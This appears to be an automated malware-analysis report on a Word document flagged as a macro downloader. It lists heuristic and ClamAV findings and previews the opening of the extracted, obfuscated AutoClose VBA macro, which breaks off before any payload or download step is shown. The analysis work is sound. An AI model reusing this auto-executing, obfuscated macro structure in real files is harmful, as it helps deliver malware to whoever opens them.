Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro that triggers on AutoClose. Heuristics indicate the macro uses GetObject and has auto-execution tokens, suggesting it's designed to download and run a secondary payload. ClamAV detection confirms its malicious nature as a downloader.
Heuristics (7)
- ClamAV: Doc.Downloader.Valyria-6595163-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 43972 bytes |
SHA-256 of macros.bas: bb98904761630c7e97e72ec31fc15c924c953a8260ca9ef0033e293ae4856c58
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoClose()
teWoTOjeCiwaS = Val("20563") & "nEmOJeWEmIlYs"
huFojenAcE = "aoTCeQug"
oxmysuLUfuagOTi = Val("73447") & "mydetIjYnOd"
Dim beFruvqYlPaWO
For beFruvqYlPaWO = 10 To 11
Dim VIQYFYHfakYbi
VIQYFYHfakYbi = Fix(63357)
Next
On Error Resume Next
FNAFiCUqICDUVy = Val("5826") & "XyCNOFAGYzUZ"
Dim CAhotaXERYW
Dim nEWYwYNUjETUs
nEWYwYNUjETUs = 24650
GYhyzowUk = 29669
Dim gOvawUXOxyiitYz
For gOvawUXOxyiitYz = 3 To 10
Dim MTenAQadyBuvIlipoJ
MTenAQadyBuvIlipoJ = Fix(98845)
Next
For CAhotaXERYW = 2 To 10
SotEdidkoPUfuKqI = Val("93768") & "nEhunIcUaOqelUdUZuhowa"
Dim LAmyTyjIW
LAmyTyjIW = 81683
vAwidepumidyX = Val("22468") & "JojyZToTiiISOHuz"
Dim HNEzImuqILAnuqOFY
HNEzImuqILAnuqOFY = Fix(37548)
Next
PuVuXYdUMy = Val("57211") & "zuBAtiiEqAqOv"
WIBoPisOWymOXIjAmabac = Val("91367") & "GOhyKolerUg"
XIrYJYKUdUg = "lUMYkOZOiURuqyPU"
MAriVuKYqyaUJyC = 59591
Dim fixYmuhIW
fixYmuhIW = 45271
KOliLODUpULaLi = "suBaMIsIdAKECymyq"
JYXewUkIBIP = "dIkUDovAxeYKAP"
mOdEaOHyvyseWuLeaoX = "qwYnAaaSIDOBOjykAv"
WaQiCAxaAsvXIpUmuBA = "fUViZUBUQyqIdlO"
Dim iiKAzazubiVuv
iiKAzazubiVuv = 41225
DoLyMutEWAwOv = Val("42089") & "tuVFewij"
qyLoKACaP = 38885
DAaaqofeiujoQdYtUBatY = 34818
wLaiyfoGNOJe = "pETOXAXUkUPUK"
BUCUHoTvXURozIdiwYV = StrReverse("")
Dim namaFIfzenULEHETitYn
namaFIfzenULEHETitYn = 786
Dim iOniYCIMoCYRf
For iOniYCIMoCYRf = 5 To 13
Dim cOnYtUGIDYtuc
cOnYtUGIDYtuc = 70145
dUkuPEFiLURIGELYdCuj = "dYpOMaHoF"
Dim pUFizelEWEpiruY
Dim bAdOcESopucarIFETuSoV
bAdOcESopucarIFETuSoV = 73163
PIRoTEsAQejIuusAvIXE = 64162
aFisipuqURaxExOHyhYA = Val("20195") & "jUBetUSIaOs"
pUFizelEWEpiruY = Fix(48105)
vodiDIMAFiV = "dApasUNOOdiJoCepeFo"
Next
Dim XETZeZaPIHUxiFoNohYX
For XETZeZaPIHUxiFoNohYX = 10 To 12
Dim lNaCuDUzE
lNaCuDUzE = Fix(2252)
Next
JENYnEVuNhIsE = Val("80308") & "oSvIdTUbYi"
Dim qAxAQagUxYnatada
qAxAQagUxYnatada = 55311
VUzUbifEIrOSvaNEf = 83287
Dim CyzafahiG
For CyzafahiG = 8 To 10
Dim veMeWLokOpiKEFOC
TYlOvArEBABUCi = 38044
BIZiBEkYhYXEWeZiwu = Val("27148") & "WeDiSOqOvYGYkHi"
VorAjEQOHIWIh = Val("83134") & "tuVotoXupIa"
veMeWLokOpiKEFOC = Fix(12927)
Next
BYScEiurU = Val("15610") & "jiNedEluCa"
Dim aYLOGOBjOGOtOiExiHu
aYLOGOBjOGOtOiExiHu = 42174
Dim MoseniwikoWiaIs
MoseniwikoWiaIs = 22036
aAjAQiuSerE = Val("96582") & "iutesUXvUaTuHU"
Dim ZYZOzydabyj
Dim bOQUTumyGygUmu
For bOQUTumyGygUmu = 4 To 12
Dim TypIguHUQYliBisU
TypIguHUQYliBisU = Fix(1866)
Next
diCEkagAGYeZyCoBehi = "jyzyhecAgUpoWiSabiZ"
ZYZOzydabyj = 89420
Dim pIBuCytimiJUFEdiM
Dim aeqimUredeBnoBuMUNug
For aeqimUredeBnoBuMUNug = 3 To 10
Dim PuhUKiNyHOpOwI
PuhUKiNyHOpOwI = Fix(33558)
Next
JbGiFOtUOXyLo = 31190
pIBuCytimiJUFEdiM = 51368
lbYnuxeDihogESyTe = Val("11633") & "tUsIaApY"
DHAmOvUlaK = 44970
Dim vuJUgokfIKYR
vuJUgokfIKYR = 56144
golOiIjwYRmuqOTuw = Val("37872") & "NabAKIRybiREdYba"
XEpIpyFYBELyL = Val("9082") & "piKinycuN"
VybUbeCIFoZoqeCynoM = "JesAPYToseZElEgYnuTUQE"
aUxaVaHEpInojiBy = 93273
ZEWIROjii = Val("55000") & "DANAtyvEZUg"
DACyCOTYtAFukOxIko = Val("3758") & "JEdYWaArurYUzobaN"
Dim sAHofisObDIXycimELiD
kUWiNeMuPuf = "qYpoZiBUNuFISuwAbos"
HauTYDIK = "divohovazuKIFAbuqU"
sAHofisObDIXycimELiD = 85095
Dim FaWYWIPYxUaUxEXxe
For FaWYWIPYxUaUxEXxe = 6 To 11
Dim aYiUSOrYFvEQE
aYiUSOrYFvEQE = Fix(50703)
Next
BAbInilOxu = "LYWaQEZOlakoMAhAGY"
Dim danUxOXaRogOHaPyNIDis
danUxOXaRogOHaPyNIDis = 17555
Dim KyfVeLolEzawEWe
KyfVeLolEzawEWe = 11381
Dim MekeqYSoxorehu
For MekeqYSoxorehu = 3 To 11
Dim fONUkiHUBokIPakuFAb
NuXYiaozATInUZWEdI = 84936
CAHaNiqubeX = Val("97140") & "gOPohOJYpYRa"
fONUkiHUBokIPakuFAb = Fix(91995)
Next
ZUwuVOxEtikeaeJESuSEmu = Val("51930") & "GSoRMOQaNKeao"
Dim WASUX
... (truncated)